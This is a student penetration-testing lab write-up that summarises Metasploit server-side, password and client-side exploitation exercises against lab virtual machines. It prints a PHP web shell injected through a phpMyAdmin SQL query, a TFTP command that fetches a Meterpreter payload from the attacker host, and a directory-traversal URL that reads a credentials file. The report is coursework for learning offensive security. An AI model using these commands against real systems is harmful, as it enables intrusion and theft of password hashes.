Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

Lab 7 - Exploitation 1 NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

Lab 7 - Exploitation 2 Item I. (What were you asked to do?) Metasploit Server Side Exploits Perform the exercises in chapter 8 of the Penetration Testing book Provide a summary of the exploits you performed and their results in your lab write up Password Attacks Perform the exercises in chapter 9 of the Penetration Testing book Provide as summary of the exploits you performed and their results in your lab write up Metasploit Client Side Exploits Perform the exercises in Chapter 10 of the Penetration Testing book Provide as summary of the exploits you performed and their results in your lab write up

Lab 7 - Exploitation 3 Item II. (What did you do?) Revisiting MS08-067 Metasploit payloads In this section of the lab we recreate the exploit that we did in Chapter 4. In this section we utilize the MS08-067 exploit to attack the Windows XP machine from the Kali virtual machine. This was fairly simple as this was previously completed in chapter 4. The options and results are in figure 1.1. Figure 1.1 Exploiting WebDav Default Credentials In the previous chapter we discovered that there was an installation of XAMPP running on the target XP machine. Since the credentials were not changed the default credentials are in place. This will allow us to upload our own items to the server. First we create a test.txt file and login to the server will the default credentials of wampp and xampp. We then upload our test.txt and attempt to reach the file with a web browser which was successful. See figure 1.2 and 1.3.

Lab 7 - Exploitation 4 Figure 1.2 Figure 1.3 Running a Script on the Target Web Server While uploading a text file is a success it is not able to do as much as a script would be able to do. Therefore in this section of the lab we upload a script to the same server with default credentials. See figure 1.4. Figure 1.4 shows a ls of the webdav directory which shows the test.php script that was uploaded. Figure 1.4

Lab 7 - Exploitation 5 Uploading a Msfvenom payload Uploading script will only get us so far on the target, it would be more beneficial to be able to upload msfvenom payload. This is because it is much easier to create a msfvenom payload then it would be to write a script. In this section we first create a msfvenom payload that will cause the infected system to open a session with the kali target. See figure 1.5. Figure 1.5 We next upload the payload to the same XAMPP server that had the default credentials. See figure 1.6. Figure 1.6 We then setup the handler that will accept the request that is generated upon execution of the payload. Then we set started the handler so that when the request was made it could exploit it and allow access to the system. See figure 1.7.

Lab 7 - Exploitation 6 Figure 1.7 Lastly we downloaded the file from the server and the payload was executed. It allowed the session to be created and the attacker was able to gain access to the system. See figure 1.8. Figure 1.8 Exploiting Open phpmyadmin The same server that we were previously able to exploit with default credentials also has an open phpmyadmin service which is able to be exploited. By navigating to the MyAdmin page on the server we are able to run an SQL query that will also allow us access to the target system. It will also enable us to be able to gain files as well as important information from the target. In the phpmyadmin shown in figure 1.9 we are able to run the following script SELECT "<?php system($_get['cmd']);?>" into outfile "C:\\xampp\\htdocs\\shell.php. This script will allow us to use the get command to obtain files off the server. To test the newly exploited vulnerability we tried to run ipconfig and were able to

Lab 7 - Exploitation 7 successfully do so see figure 1.10. Figure 1.9 Figure 1.10 Downloading a File with TFTP In this section we attempt a second method for downloading files from our Kali machine. This method is to use TFTP. First we start the service using the following command: atftpd --daemon --bind-address 192.168.20.9 /tmp. Next, we downlaod the file using the following command: http://192.168.20.10/shell.php?cmd=tftp 192.168.20.9 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php.

Lab 7 - Exploitation 8 Downloading Sensitive Files In this section we focus again on exploiting XAMPP and downloading files from the target XP Machine. First we download the Zervit server configuration using the following command: http://192.168.20.10:3232/index.html?../../../../../../xampp/filezillaftp/filezilla%20server.xml Stored in this file are the hashes of the users passwords which can be obtained using a password cracker which we will discuss in the next chapter. The next file that we downlaod using this method is the SAM file. The SAM file is the Windows Security Accounts Manager file. This file stores the hashes for the user account passwords. We first try to do this on the currently running SAM file and this was unsuccessful see figure 1.11. Therefore we obtained the files from the backup of the files. This method was successful and we were able to obtain the SAM and SYSTEM file. See figure 1.12 and 1.13. Figure 1.11 Figure 1.12

Lab 7 - Exploitation 9 Figure 1.13 Exploiting a Buffer Overflow in Third-Party Software This section was designed to exploit the SL Mail program that is running on the Windows XP target. Unfortunately, it was unsuccessful due to the services on the XP Machine failing to launch. See figure 1.16. These services were suppose to run on POP3 which would have enabled us to be able to exploit that service. This issue was not discovered until after the exploit failed to launch therefore figure 1.14 shows setting the options, figure 1.15 shows the exploit that failed, and figure 1.16 shows the service that would not start. Figure 1.14 Figure 1.15

Lab 7 - Exploitation 10 Figure 1.16 Exploiting Third-Party Web Applications Unfortunately, similar to the previous section of the lab this section failed to launch successfully. I was able to load the module and set the options but the exploit would not launch the payload. It was able to figure out server information but not launch the payload. This was the same issue that others in the class were having as well. See figure 1.17.

Lab 7 - Exploitation 11 Figure 1.17 Exploiting a Compromised Service This section focuses on how to exploit a vulnerability in the Very Secure FTP 2.3.4. This exploit involves placing a smiley face after the username and then entering any password. If the service is vulnerable it will allow access to the system. In our case it was vulnerable.(figure 1.18) We were then able to start a netcat session. (Figure 1.19) Figure 1.18 Figure 1.19 Exploiting Open NFS Shares In this section we exploit the vulnerability that was discovered in the first hacking challenge that we completed. First we start by mounting an NFS share. We then cs to the mount and view the contents of the.ssh directory. In the directory are the public and private keys as well as the authorized keys. See figure 1.20.

Lab 7 - Exploitation 12 Figure 1.20 Next we generate new SSH keys using the default options. See figure 1.21 Figure 1.21

Lab 7 - Exploitation 13 Next we added our key to the targets list of authorized keys. Once we have done that we are able to gain SSH access to the system without the need for a password. See figure 1.22. Figure 1.22

Lab 7 - Exploitation 14 Chapter 9 focuses on password attacks. It starts with the basics such as what a password list is as well as what a username list it. It then discusses as tool called crunch which will generate a brute force list based on the given parameters. See figure 2.1 for an example. Figure 2.1 Guessing Usernames and Passwords with Hydra This section utilizes the POP3 service that we were not able to run in chapter 8, therefore this was unsuccessful and not able to be completed. Recovering Password Hashes from a Windows SAM file In this section we use the files obtained in chapter 8 to try and determine the passwords for the users of the Windows XP target. We utilize the bkhive program on the key that we obtained and it returned the Root Key and the Boot Key. We then input this information into the samdump2 program and are able to determine the hashes. Dumping Passwords with Physical Access We do not have physical access to the system therefore we could not complete this section.

Lab 7 - Exploitation 15 All Ports The allports module in metasploit will try to set up a connection on each port until it finds a successful port. This can be very useful if there is a firewall in place and we do not know which port can be leveraged. In this section we attempt this attack on the Windows XP system. See figure 2.2, 2.3, 2.4. Figure 2.2 Figure 2.3 Figure 2.4 Browser Exploitation Since different types of traffic can be filtered we can utilize HTTP which is very commonly allowed through the firewall because it is essential. It can be filtered based on certain parameters but good attacks can bypass these filters. These types of attacks will be demonstrated in this section. The module we will use in metasploit is aurora. We set the options and then begin the service which can be used until out target connects back to the system. See figure 2.5.

Lab 7 - Exploitation 16 Figure 2.5 Now we would utilize some sort of social engineering or spam email to get our target to connect to the needed web address. Once we do that the exploit is completed and we obtain a session with the target. See figure 2.6. Figure 2.6 The problem with the above solution is that it causes the targets Internet Explorer to stop responding causing them to close the program. When they close the program that causes our session to be closed. Therefore the more practical application of the attack would be to have the target immediately migrate the session to a separate process that way it is persistent. This is exactly what we did in this section and is demonstrated in figure 2.7.

Lab 7 - Exploitation 17 Figure 2.7 PDF Exploits In this section we package an exploit into a PDF that way we are able to have our target open the PDF to launch the attack and gain access. We start by using the adobe_utilprintf module of metasploit to make the pdf. No options need to be set to create the PDF. We then moved the files to the apache server on our local system so they can be accessed. See figure 2.8. See figure 2.8 We then start the reverse handler on the Kali system to get the incoming request to be able to exploit it. We then start the handler and direct the target to the file and we have established a session. See figure 2.9.

Lab 7 - Exploitation 18 Figure 2.9 We then run into an issue where the handler closes after the first system is attached. Therefore we set the advanced options in the handler to allow for multiple sessions see figure 2.10. Figure 2.10 PDF Embedded Executable In this section we bundle a malicious payload inside a PDF to exploit the target system. The first step is to create the PDF. Unfortunately the PDF file is not where the book says to find it. First I had to use locate to the find the file. See figure 2.11. Figure 2.11 I then tried to change the filetype to a regular PDF since it was.pdf.gz and the module would not accept it. Unfortunately it was unsuccessful and would not accept the file. See figure 2.12, 2.13, 2.14.

Lab 7 - Exploitation 19 Figure 2.12 Figure 2.13 Figure 2.14 Java Exploits In this section we set up a scenario very similar to the one with Adobe. We start by creating the malicious payload using similar options to the other modules. The module used is the java_jre17_jmxbean. The options for the module were set in figure 2.15, we then started the service. Next we directed the target to the URL and the connection was established in figure 2.16. Figure 2.15

Lab 7 - Exploitation 20 Figure 2.16 Signed Java Applet This module in metasploit is very similar to the previous module. The benefit is that no vulnerability is needed because we ask the user to approve the action. While it seems like doing this would be unsuccessful many users to not bother to read the messages and just approve the action. The options for the module were set in figure 2.17 and we began the exploit. Figure 2.17 We then connected the target to the URL listed. Upon loading the page the user is asked to approve the action, see figure 2.18.

Lab 7 - Exploitation 21 Figure 2.18 Once the user clicks run we are then able to obtain access to the system. See figure 2.19 Figure 2.19 browser_autopwn Unfortunately, this module would not run successfully, it was tried multiple times and we always received back that there were no exploit modules. See figure 2.20

Lab 7 - Exploitation 22 Figure 2.20 The last section was the Winamp section. In this section we convince the user to install a vulnerable skin that will allow us access to the target system. First we have to create the malicious file to place in the skin files. We do this by using a metasploit module named winamp_maki_bof. Once we set the options the malicious file is created see figure 2.21. Figure 2.21

Lab 7 - Exploitation 23 We then send the file to the apache server so that it can be access from the other systems. Next we copied the default skin for Winamp and rename it rocketship. We then replace the mcvcore.maki with the malicious file that we created. We then set the skin in Winampp to the malicious skin, once we do this Winamp will close and we then have an open session to the Windows 7 target. Difficulties Through out the lab we faced many difficulties that caused many of the sections to not function properly. For example the POP3 service would not start which caused parts of Chapter 8 not work, which then caused part of chapter 9 not to function. Another issue that was present was that the User Manual file would not be accepted by the metasploit module because it said it was not the correct format. In addition some of the instructions in the text were vague which resulted in having to complete some steps several times before the user is able to properly interpret the instructions. One of the greatest points of frustration was when trying to complete the lab was that the book says to kill the handler job and that you can just start it back up but every time I did this I was not able to bring the handler back up. Each time the handler was started and no session was started I would have to reboot the entire VM before I could relaunch the handler. What did I learn? While there were frustrating moments in the lab in the end I did learn a lot. Firstly, I learned many different ways to obtain access to a system besides the traditional ways that were learned in previous chapters. The lab also caused me to think twice anytime I skip an update for a piece of software. I always knew how important software updates were but never realized how easy it was to exploit an outdated version of Java. In addition I learned how easy it was to create malicious payloads and place them into a file or link to a malicious website. It may be that I was naive but I always thought these types of exploits took someone with a high level of programming knowledge but it turns out it doesn't. This lab was definitely an eye-opener.